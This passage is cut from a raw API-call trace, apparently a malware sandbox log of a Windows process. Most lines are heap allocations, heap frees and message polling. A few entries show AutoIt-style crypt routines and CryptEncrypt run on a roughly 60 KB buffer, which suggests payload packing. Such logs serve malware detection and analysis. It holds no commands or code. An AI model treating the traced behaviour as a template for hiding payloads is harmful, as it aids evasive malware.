dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0041.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0041.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.045] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0041.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0041.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0041.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0041.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0041.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0041.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0041.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0041.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0041.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0041.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0041.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0041.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0041.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0041.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0041.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0041.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0041.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0041.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0041.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0041.046] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0041.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0041.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0041.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0041.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0041.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0041.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0041.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0041.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0041.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0041.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0041.046] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0041.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c7f0 [0041.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0041.047] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0041.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0041.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0041.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0041.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0041.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0041.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0041.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0041.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0041.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0041.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0041.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0041.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0041.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0041.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0041.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0041.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0041.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0041.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0041.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0041.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0041.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0041.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0041.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0041.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0041.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0041.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0041.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0041.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0041.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0041.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0041.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0041.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0041.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0041.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0041.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0041.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0041.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0041.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0041.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0041.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0041.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0041.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0041.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0041.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0041.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0041.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0041.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0041.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0041.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0041.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0041.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0041.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0041.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0041.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0041.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0041.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0041.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0041.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0041.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0041.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0041.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0041.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0041.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0041.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0041.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0041.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0041.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0041.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0041.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0041.050] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0041.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0041.050] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da278, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da278*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0041.050] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.050] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.050] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.050] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.050] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.050] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0041.050] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.050] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.051] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0041.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0041.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0041.051] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.051] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0041.051] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0041.051] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0041.051] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.051] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0041.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0041.051] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.051] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0041.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0041.051] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.051] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.051] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.051] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0041.051] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.051] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0041.052] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.052] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.052] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0xece8, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0xecf0) returned 1 [0041.052] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.052] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0041.052] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.052] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.052] CharLowerBuffW (in: lpsz="byte[60657]", cchLength=0xb | out: lpsz="byte[60657]") returned 0xb [0041.052] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.053] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.053] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.054] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.054] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.054] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x943cf8*, pdwDataLen=0x6ae220*=0xece8, dwBufLen=0xecf0 | out: pbData=0x943cf8*, pdwDataLen=0x6ae220*=0xecf0) returned 1 [0041.054] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.054] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0041.054] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.054] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.054] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.054] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.054] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0041.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0041.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.055] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.055] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0041.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.055] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.055] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0041.055] HeapFree (in: 